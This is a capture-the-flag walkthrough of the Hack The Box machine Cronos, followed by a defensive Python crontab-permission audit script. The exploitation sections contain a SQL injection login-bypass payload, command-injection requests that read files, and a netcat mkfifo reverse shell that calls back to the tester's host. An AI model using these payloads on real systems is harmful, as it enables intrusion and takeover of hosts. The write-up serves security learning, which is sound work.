Summary

Cronos is an easy Linux box that can be exploited by properly enumerating all ports and services. Enumerating DNS reveals multiple domains. The admin login page is vulnerable to SQL injection, after which command injection can be used to obtain a low-privilege shell. Privileges can be escalated by exploiting a PHP cron job.


Discovery

Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn 10.129.28.223

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 18:b9:73:82:6f:26:c7:78:8f:1b:39:88:d8:02:ce:e8 (RSA)
|   256 1a:e6:06:a6:05:0b:bb:41:92:b0:28:bf:7f:e5:96:3b (ECDSA)
|_  256 1a:0e:e7:ba:00:cc:02:01:04:cd:a3:a9:3f:5e:22:20 (ED25519)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.10.3-P4-Ubuntu
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

After navigating to the server, I quickly started enumerating DNS. In this case you have to add the domain cronos.htb to your hosts file. You can then run dig to enumerate subdomains like so:

dig axfr @10.129.28.223 cronos.htb

; DiG 9.16.4-Debian axfr @10.129.28.223 cronos.htb
; (1 server found)
;; global options: +cmd
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
cronos.htb.		604800	IN	NS	ns1.cronos.htb.
cronos.htb.		604800	IN	A	10.129.28.223
admin.cronos.htb.	604800	IN	A	10.129.28.223
ns1.cronos.htb.		604800	IN	A	10.129.28.223
www.cronos.htb.		604800	IN	A	10.129.28.223
cronos.htb.		604800	IN	SOA	cronos.htb. admin.cronos.htb. 3 604800 86400 2419200 604800
;; Query time: 16 msec
;; SERVER: 10.129.28.223#53(10.129.28.223)
;; WHEN: Mon Oct 26 20:48:09 CET 2020
;; XFR size: 7 records (messages 1, bytes 203)

Exploitation

The server showed that the Laravel framework was used, so I spent quite some time looking into exploits for Laravel. However, this was apparently not the way to go, so I kept looking and finally found that the admin login is vulnerable to SQL injection. I used Burp Suite to test this and found the following payload:

username=tes'%20OR%201%20--%20-&password=test

URL decoded to:

username=tes' OR 1 -- -&password=test

The server returns a 302 Found to:

HTTP/1.1 302 Found
Date: Mon, 26 Oct 2020 19:56:28 GMT
Server: Apache/2.4.18 (Ubuntu)

location: welcome.php

Authentication was successfully bypassed and the user is now presented with a new page.

Command Injection

At this point it is relatively clear that there is a command injection. The ‘ping’ option, when intercepted, looked like this:

POST /welcome.php HTTP/1.1
Host: admin.cronos.htb

command=ping+-c+1&host=10.10.14.31

After experimenting with this command, I found that you can execute arbitrary commands with the following payload:

POST /welcome.php HTTP/1.1
Host: admin.cronos.htb

command=ls;ping+-c+1&host=10.10.14.31

With the following request you can read user.txt belonging to the user noulis:

POST /welcome.php HTTP/1.1
Host: admin.cronos.htb

command=cat%20/home/noulis/user.txt;ping+-c+1&host=10.10.14.31

I found it a little tricky to get a reverse shell, as neither the netcat nor the PHP reverse shell from pentestmonkey worked. I looked up which reverse shell was used and found this one:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.31 4444 >/tmp/f

I URL-encoded this with Burp and obtained a reverse shell this way.


Privilege Escalation

I always start by running linpeas. Linpeas flagged the following in red/yellow, which means it is highly suspicious:

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

* * * * *	root	php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

This file has the following permissions:

-rwxr-xr-x  1 www-data www-data    1646 Apr  9  2017 artisan

This means that you, as the www-data user, can modify this file, and root runs it every minute. It is important to note that it is a PHP file. The PHP reverse shell from pentestmonkey was downloaded, named artisan, and transferred over with wget; a minute later a shell was obtained as the root user!
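As an added example (not part of the original writeup), here is a small Python audit for the root cause of this escalation: a root cron job executing a file that another user owns or can write. The crontab text and the file metadata are constructed samples that mirror the entry linpeas flagged; the function and variable names are assumptions of the example, not anything from the box.

```python
import os, re, stat
# /etc/crontab and /etc/cron.d format: five time fields, the user, then the command.
_JOB_RE = re.compile(r"^\s*(\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+?)\s*$")

def parse_crontab(text):
    """Return (user, command) pairs; comments are skipped and VAR=value lines never match."""
    jobs = []
    for line in text.splitlines():
        m = _JOB_RE.match(line)
        if m and not line.lstrip().startswith("#"):
            jobs.append((m.group("user"), m.group("cmd")))
    return jobs

def command_paths(cmd):
    """Absolute paths named in a command, including a script handed to an interpreter."""
    return [t for t in re.split(r"[\s;|&]+", cmd) if t.startswith("/") and t != "/dev/null"]

def audit_crontab(text, stat_fn=os.stat):
    """Return (path, reason) for each root job that runs a file a non-root user owns or can write."""
    findings = []
    for user, cmd in parse_crontab(text):
        if user != "root":
            continue
        for path in command_paths(cmd):
            try:
                st = stat_fn(path)
            except (FileNotFoundError, KeyError):
                continue  # missing on the host, or absent from the offline sample table
            if st.st_uid != 0:
                findings.append((path, f"owned by uid {st.st_uid}, not root"))
            elif st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                findings.append((path, "writable by group or other"))
    return findings

# Constructed sample crontab; the last job mirrors the entry linpeas flagged on Cronos.
SAMPLE_CRONTAB = """\
0 3\t* * *\troot\t/usr/local/bin/backup.sh >> /var/log/backup.log 2>&1
30 6\t* * *\twww-data\t/var/www/laravel/artisan queue:work
* * * * *\troot\tphp /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
"""
# Constructed (uid, mode) pairs standing in for os.stat on the target; uid 33 is www-data on Ubuntu.
SAMPLE_STAT = {"/var/www/laravel/artisan": (33, 0o100755), "/usr/local/bin/backup.sh": (0, 0o100775)}

def stat_from_table(table):
    """Stat function backed by the sample table (KeyError doubles as file-not-found) for offline use."""
    def _stat(path):
        uid, mode = table[path]
        return os.stat_result((mode, 0, 0, 1, uid, 0, 0, 0, 0, 0))
    return _stat
```

On a real host, call audit_crontab with the contents of /etc/crontab and each file under /etc/cron.d and the default os.stat; the artisan entry is reported because the file is owned by www-data rather than root.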


Conclusion

I found this box a lot of fun. It started off a bit difficult with the DNS part, but it turned into a really nice and straightforward box. It was often very clear what the exploitation path was, so this saved some time. I spent a couple of hours on this box and had a lot of fun doing it. Hope you enjoyed my tutorial!